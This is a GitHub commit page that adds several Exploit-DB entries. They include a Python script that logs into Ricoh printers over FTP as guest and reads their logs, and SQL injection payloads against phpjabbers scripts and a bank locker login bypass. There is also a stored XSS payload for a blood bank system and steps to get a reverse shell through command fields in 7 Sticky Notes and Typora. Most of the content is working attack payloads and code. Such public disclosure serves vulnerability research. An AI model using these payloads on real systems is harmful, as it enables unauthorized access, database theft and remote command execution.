forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
10 changes to exploits/shellcodes/ghdb Ricoh Printer - Directory and File Exposure Blood Bank & Donor Management System using v2.2 - Stored XSS Equipment Rental Script-1.0 - SQLi Bank Locker Management System - SQL Injection Fundraising Script 1.0 - SQLi PHP Shopping Cart 4.2 - Multiple-SQLi 7 Sticky Notes v1.9 - OS Command Injection Typora v1.7.4 - OS Command Injection
- Loading branch information
Exploit-DB
committed
Jan 30, 2024
1 parent
967f9d1
commit a5920da
Showing
10 changed files
with
270 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,52 @@ | ||
#Exploit Title: Ricoh Printer Directory and File Exposure | ||
#Date: 9/15/2023 | ||
#Exploit Author: Thomas Heverin (Heverin Hacker) | ||
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers | ||
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py | ||
#Version: Ricoh Printers - All Versions | ||
#Tested on: Windows | ||
#CVE: N/A | ||
|
||
#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log) | ||
|
||
from ftplib import FTP | ||
|
||
def ftp_connect(ip): | ||
try: | ||
ftp = FTP(ip) | ||
ftp.login("guest", "guest") | ||
print(f"Connected to {ip} over FTP as 'guest'") | ||
return ftp | ||
except Exception as e: | ||
print(f"Failed to connect to {ip} over FTP: {e}") | ||
return None | ||
|
||
if __name__ == "__main__": | ||
target_ip = input("Enter the Ricoh Printer IP address: ") | ||
|
||
ftp_connection = ftp_connect(target_ip) | ||
if ftp_connection: | ||
try: | ||
while True: | ||
file_list = ftp_connection.nlst() | ||
print("List of Ricoh printer files and directories:") | ||
for index, item in enumerate(file_list, start=1): | ||
print(f"{index}. {item}") | ||
|
||
file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1 | ||
if file_index < 0: | ||
break | ||
|
||
if 0 <= file_index < len(file_list): | ||
selected_file = file_list[file_index] | ||
lines = [] | ||
ftp_connection.retrlines("RETR " + selected_file, lines.append) | ||
print(f"Contents of '{selected_file}':") | ||
for line in lines: | ||
print(line) | ||
else: | ||
print("Invalid file index.") | ||
except Exception as e: | ||
print(f"Failed to perform operation: {e}") | ||
finally: | ||
ftp_connection.quit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
## Title: Equipment Rental Script-1.0 - SQLi | ||
## Author: nu11secur1ty | ||
## Date: 09/12/2023 | ||
## Vendor: https://www.phpjabbers.com/ | ||
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo | ||
## Reference: https://portswigger.net/web-security/sql-injection | ||
|
||
## Description: | ||
The package_id parameter appears to be vulnerable to SQL injection | ||
attacks. The payload ' was submitted in the package_id parameter, and | ||
a database error message was returned. You should review the contents | ||
of the error message, and the application's handling of other input, | ||
to confirm whether a vulnerability is present. The attacker can steal | ||
all information from the database! | ||
|
||
[+]Payload: | ||
mysql | ||
|
||
Parameter: #1* ((custom) POST) | ||
Type: error-based | ||
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) | ||
Payload: package_id=(-4488))) OR 1 GROUP BY | ||
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 | ||
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING | ||
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00 | ||
|
||
## Reproduce: | ||
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0 | ||
|
||
System Administrator - Infrastructure Engineer | ||
Penetration Testing Engineer | ||
home page: https://www.nu11secur1ty.com/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS | ||
# Application: Blood Donor Management System | ||
# Version: v2.2 | ||
# Bugs: Stored XSS | ||
# Technology: PHP | ||
# Vendor Homepage: https://phpgurukul.com/ | ||
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/ | ||
# Date: 12.09.2023 | ||
# Author: SoSPiro | ||
# Tested on: Windows | ||
|
||
#POC | ||
======================================== | ||
1. Login to admin account | ||
2. Go to /admin/update-contactinfo.php | ||
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload. | ||
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
# Exploit Title: Bank Locker Management System - SQL Injection | ||
# Application: Bank Locker Management System | ||
# Date: 12.09.2023 | ||
# Bugs: SQL Injection | ||
# Exploit Author: SoSPiro | ||
# Vendor Homepage: https://phpgurukul.com/ | ||
# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/ | ||
# Tested on: Windows 10 64 bit Wampserver | ||
|
||
## Description: | ||
This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application. | ||
|
||
## Vulnerability Details: | ||
- **Application Name**: Bank Locker Management System | ||
- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/) | ||
- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/) | ||
|
||
## Vulnerability Description: | ||
The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields: | ||
|
||
Payload: admin' or '1'='1-- - | ||
|
||
An attacker can gain unauthorized access to the application with administrative privileges. | ||
|
||
## Proof of Concept (PoC): | ||
1. Visit the application locally at http://blms.local (assuming it's hosted on localhost). | ||
2. Navigate to the "banker" directory: http://blms.local/banker/ | ||
3. In the login and password fields, input the following payload: | ||
4. admin' or '1'='1-- - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
## Title: Fundraising Script-1.0 SQLi | ||
## Author: nu11secur1ty | ||
## Date: 09/13/2023 | ||
## Vendor: https://www.phpjabbers.com/ | ||
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo | ||
## Reference: https://portswigger.net/web-security/sql-injection | ||
|
||
## Description: | ||
The `cid` parameter appears to be vulnerable to SQL injection attacks. | ||
The payload ' was submitted in the cid parameter, and a database error | ||
message was returned. | ||
The database is empty, but if it is not, this will be over for the | ||
money of the donors and their bank accounts! | ||
The attacker can steal all information from the database! | ||
|
||
[+]Payload: | ||
mysql | ||
|
||
Parameter: cid (GET) | ||
Type: error-based | ||
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) | ||
Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT | ||
(ELT(1741=1741,1))),0x7162787171),3873)) | ||
|
||
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0 | ||
|
||
System Administrator - Infrastructure Engineer | ||
Penetration Testing Engineer | ||
nu11secur1ty <http://nu11secur1ty.com/> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,45 @@ | ||
## Title: PHP Shopping Cart-4.2 Multiple-SQLi | ||
## Author: nu11secur1ty | ||
## Date: 09/13/2023 | ||
## Vendor: https://www.phpjabbers.com/ | ||
## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing | ||
## Reference: https://portswigger.net/web-security/sql-injection | ||
|
||
## Description: | ||
The `id` parameter appears to be vulnerable to SQL injection attacks. | ||
A single quote was submitted in the id parameter, and a database error | ||
message was returned. Two single quotes were then submitted and the | ||
error message disappeared. The attacker easily can steal all | ||
information from the database of this web application! | ||
WARNING! All of you: Be careful what you buy! This will be your responsibility! | ||
|
||
[+]Payload: | ||
mysql | ||
|
||
Parameter: id (GET) | ||
Type: boolean-based blind | ||
Title: OR boolean-based blind - WHERE or HAVING clause (NOT) | ||
Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT | ||
3795=3795-- sRcp&session_id= | ||
|
||
Type: error-based | ||
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or | ||
GROUP BY clause (GTID_SUBSET) | ||
Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND | ||
GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT | ||
(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id= | ||
|
||
Type: time-based blind | ||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) | ||
Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND | ||
(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id= | ||
|
||
## Reproduce: | ||
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2 | ||
|
||
## Proof and Exploit: | ||
https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html | ||
|
||
System Administrator - Infrastructure Engineer | ||
Penetration Testing Engineer | ||
nu11secur1ty <http://nu11secur1ty.com/> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection | ||
# Discovered by: Ahmet Ümit BAYRAM | ||
# Discovered Date: 12.09.2023 | ||
# Vendor Homepage: http://www.7stickynotes.com | ||
# Software Link: | ||
http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe | ||
# Tested Version: 1.9 (latest) | ||
# Tested on: Windows 2019 Server 64bit | ||
|
||
# # # Steps to Reproduce # # # | ||
|
||
# Open the program. | ||
# Click on "New Note". | ||
# Navigate to the "Alarms" tab. | ||
# Click on either of the two buttons. | ||
# From the "For" field, select "1" and "seconds" (to obtain the shell | ||
within 1 second). | ||
# From the "Action" dropdown, select "command". | ||
# In the activated box, enter the reverse shell command and click the "Set" | ||
button to set the alarm. | ||
# Finally, click on the checkmark to save the alarm. | ||
# Reverse shell obtained! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
# Exploit Title: Typora v1.7.4 - OS Command Injection | ||
# Discovered by: Ahmet Ümit BAYRAM | ||
# Discovered Date: 13.09.2023 | ||
# Vendor Homepage: http://www.typora.io | ||
# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe | ||
# Tested Version: v1.7.4 (latest) | ||
# Tested on: Windows 2019 Server 64bit | ||
|
||
# # # Steps to Reproduce # # # | ||
|
||
# Open the application | ||
# Click on Preferences from the File menu | ||
# Select PDF from the Export tab | ||
# Check the “run command” at the bottom right and enter your reverse shell | ||
command into the opened box | ||
# Close the page and go back to the File menu | ||
# Then select PDF from the Export tab and click Save | ||
# Reverse shell is ready! |
Oops, something went wrong.